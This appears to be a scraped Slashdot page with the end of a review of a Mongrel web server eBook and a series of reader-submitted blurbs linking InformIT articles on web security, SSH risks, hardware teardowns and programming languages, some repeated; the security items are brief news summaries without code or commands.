Section four covers configuration and the array of command-line options available to the developer or administrator running Mongrel. Section five looks at production deployment and examines a typical deployment. Now, production deployments are an art in themselves, so not every aspect can be covered in a section like this, but it does get you started and presents a not unreasonable approach. Section six explores the options for extending Mongrel. Write your own commands, handlers and plugins; this section will show you how.

Section seven shows how to debug your Mongrel configuration and applications. Section eight looks at performance, another thing that's hard to generalize. Here the emphasis is mostly on gathering data so that you can make meaningful decisions for your own situation. Finally, there is a collection of resources; links for Mongrel, and frameworks that run on it.

In addition to the reasons to like the book that I mentioned back at the start of the review, the book is very authoritative. Having Zed Shaw, the primary author of Mongrel, as the co-author is a powerful help of course. Speaking of Zed, I very much enjoyed his little "Zed Sez" sidebars. To describe his style as "pithy" might be an understatement, but they are certainly very informative and they give interesting insight into the writing of a rising star open-source software package.

For all of the positives, there is no hiding the fact that this Shortcut eBook is only 106 pages long. One of the consequences of this is that there is reduced depth. The material that is in the book is very good, but I know that there were a couple of places where more material would have been very useful. So, if you normally look for vast tomes of ultimate completeness, this might not be a good selection for you.

In conclusion, this seems like a very useful guide for anyone who is starting out to configure and use the Mongrel web server for their Ruby projects.

Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

shifted89 writes "Over the last year, the security community have exposed web application security for what it is — extremely lacking. However, for all the focus on XSS, CSRF, history stealing, etc., not much attention has been given to the cookie. Unfortunately, cookie misuse can be just as dangerous, if not more so than XSS attacks and InformIT illustrates why. In short, the author clearly demonstrates what can happen when a website improperly uses cookies for customer tracking — including a working illustration."

mrmcgeeber writes "There are two ways to take apart the Wii. The first, as demonstrated by Popular Science, involves breaking the Wii open due to a lack of tools. The second method is a more formal Wii disassembly guide, which is provided by InformIT.com. Either way, you can see some detailed pictures of the internals of the Wii and how the parts are laid out. The InformIT.com version also includes an eight minute teardown video."

An anonymous reader writes "Informit has a quick look at Microsoft's Expression suite consisting of Graphic Designer, Interactive Designer, and Web Designer in comparison to Dreamweaver. It seems that Microsoft got tired of relying on FrontPage and is actually going after professionals. From the article: 'What designers might not realize is that Microsoft finally drank the Kool-Aid. The Expression Web Designer application walks the Web standards walk. One caution: Web Designer currently only supports ASP.NET. Microsoft built the ASP.NET platform; it isn't a surprise that Expression Web Designer was designed to support that platform. This is obviously a drawback for those designers who work with PHP, JSP, and other non-ASP.NET platforms, making it difficult for Microsoft to expand its reach beyond the ASP.NET users.'"

twistedmoney45 writes "Informit.com provides an insiders look at a real life XSS attack and how it was used to bypass the authentication scheme of an online web application, leading to "shell" access, an admin account, and more. XSS attacks are often discussed in theory — this walk through illustrates just how dangerous these types of attacks can be in reality."

twistedmoney45 writes "Informit.com provides an insiders look at a real life XSS attack and how it was used to bypass the authentication scheme of an online web application, leading to "shell" access, an admin account, and more. XSS attacks are often discussed in theory — this walk through illustrates just how dangerous these types of attacks can be in reality."

nitsudima writes to tell us Informit's David Chisnall takes a look at the 'myth' of high-level languages versus speed and why it might not be entirely accurate. From the article: "When C was created, it was very fast because it was almost trivial to turn C code into equivalent machine code. But this was only a short-term benefit; in the 30 years since C was created, processors have changed a lot. The task of mapping C code to a modern microprocessor has gradually become increasingly difficult. Since a lot of legacy C code is still around, however, a huge amount of research effort (and money) has been applied to the problem, so we still can get good performance from the language."

ticketmaster41 writes "Informit is running an article that takes a look at what's inside a Scooba. As the write up indicates, adding water to a robotic cleaner not only means more parts, but also more fail safes to frustrate the end user. The site also has posted an interview with Helen Greiner, one of the founders of iRobot."

ticketmaster41 writes "Informit is running an article that takes a look at what's inside a Scooba. As the write up indicates, adding water to a robotic cleaner not only means more parts, but also more fail safes to frustrate the end user. The site also has posted an interview with Helen Greiner, one of the founders of iRobot."

ticketmaster41 writes "Informit is running an article that takes a look at what's inside a Scooba. As the write up indicates, adding water to a robotic cleaner not only means more parts, but also more fail safes to frustrate the end user. The site also has posted an interview with Helen Greiner, one of the founders of iRobot."

nitsudima writes to mention a post on the Informit site about the common misunderstandings surrounding SSH, and how well-intentioned admins may be creating holes in their own security by using it. From the article: "In UNIX, all things are files. To send network traffic, UNIX writes the traffic to the network device file. In this case, the connection to Box A (and that private key used for authentication) is a socket file. This file will shuttle the authentication traffic between Box A and Box P. So what's the risk? Maybe the hacker can't get a copy of the private key through the socket file, but something better (from his/her view) can be done. If the hacker has root on Box D, he or she can point a private copy of the agent forwarding software to that socket file and thereby point the authentication process to the administrator's credentials--the ones kept on the 'safe' intranet. What are the chances that the administrator has configured access to all the DMZ servers he controls?"

nitsudima writes "The mobile devices you know and love are great for productivity, but they have completely changed the vulnerability state of our networks. Norm Laudermilch tells you why you should be afraid, very afraid." From the article: "The new and largely unexplored propagation vector for malicious code distribution is mobile devices. With 802.11, Bluetooth, WiFI, WiMAX, MMS, Infrared, and cellular data capabilities on almost all new models, these devices provide a wealth of opportunity for the transmission of data. With no notion of user access levels in the compact mobile operating systems, a lack of effective authentication, and no data encryption, these environments are prime targets for the incubation of malicious code."

sethfogie wrote to mention Informit.com's coverage of the Mid-Atlantic Regional Collegiate Cyber Defense Competition. Students put their skills to the test, trying to lock down systems against intrusion from an invading hacker team. All in the name of learning. From the article: "When the three hour grace period was over, the Red Team slowly worked their way into attack mode. One member started to sort through the information they gleaned from their scans and investigated each possible exploit. Another member fired up a MySQL database client and started to poke around the students databases looking for sensitive data. The two others were adding/changing accounts to routers, firewalls, and systems. However, for the most part, the students were not being pelted with attacks. And this continued for the next several hours."

sethfogie wrote to mention Informit.com's coverage of the Mid-Atlantic Regional Collegiate Cyber Defense Competition. Students put their skills to the test, trying to lock down systems against intrusion from an invading hacker team. All in the name of learning. From the article: "When the three hour grace period was over, the Red Team slowly worked their way into attack mode. One member started to sort through the information they gleaned from their scans and investigated each possible exploit. Another member fired up a MySQL database client and started to poke around the students databases looking for sensitive data. The two others were adding/changing accounts to routers, firewalls, and systems. However, for the most part, the students were not being pelted with attacks. And this continued for the next several hours."

FleaPlus writes "iRobot has quietly released the specifications (pdf) for the Roomba Serial Control Interface. Using a serial port one can now tinker with the Roomba by controlling behaviors, programming new songs, and remotely monitoring sensors. Hopefully this will allow for some clever hacks."

/ASCII writes "Bjarne Stroustrup, the father of C++, has written an essay [PDF] on the features of the upcoming C++0x standard. In his essay, he argues that new features should whenever possible go into the standard library and not into the language, but that the language needs to shave of a few rough corners to make it easier to use for novices."

Tiberius_Fel writes "Informit.com is running an extensive article about the anatomy of a hack against a sample network. It's an excerpt from a book titled Protect Your Windows Network: From Perimeter to Data. Even though it makes references to Windows, the techniques can be applied to other operating systems fairly easily." From the article: "Although attacking networks can be fun and informative--not to mention illegal if you do not have all the proper permissions--the fact remains that the vast majority of us do not need to know how to do so. Frankly, becoming a good penetration tester (pen tester) takes more than a week-long class. It takes commitment, dedication, intuition, and technical savvy, not to mention a blatant disregard for the rules and the right way to do things."

Tiberius_Fel writes "Informit.com is running an extensive article about the anatomy of a hack against a sample network. It's an excerpt from a book titled Protect Your Windows Network: From Perimeter to Data. Even though it makes references to Windows, the techniques can be applied to other operating systems fairly easily." From the article: "Although attacking networks can be fun and informative--not to mention illegal if you do not have all the proper permissions--the fact remains that the vast majority of us do not need to know how to do so. Frankly, becoming a good penetration tester (pen tester) takes more than a week-long class. It takes commitment, dedication, intuition, and technical savvy, not to mention a blatant disregard for the rules and the right way to do things."

fogez writes "We have seen numerous hacks for the PSP in the last couple days, but have you see what is inside this marvel? This might scare off many new PSP owners, but if you are curious and want some direction, this article is a good place to start. See the PSP laid bare, from LCD to wireless network card. BTW, any attempt to imitate will result in a void warranty :)"

fogez writes "We have seen numerous hacks for the PSP in the last couple days, but have you see what is inside this marvel? This might scare off many new PSP owners, but if you are curious and want some direction, this article is a good place to start. See the PSP laid bare, from LCD to wireless network card. BTW, any attempt to imitate will result in a void warranty :)"

prostoalex writes "An article on InformIT.com looks at the current state of haptic technologies: "In the consumer realm, two companies dominate the field in the creation of tactile I/O devices: Immersion Corporation and SensAble Technologies. Right now, each seems interested in consolidating a position in the marketplace.""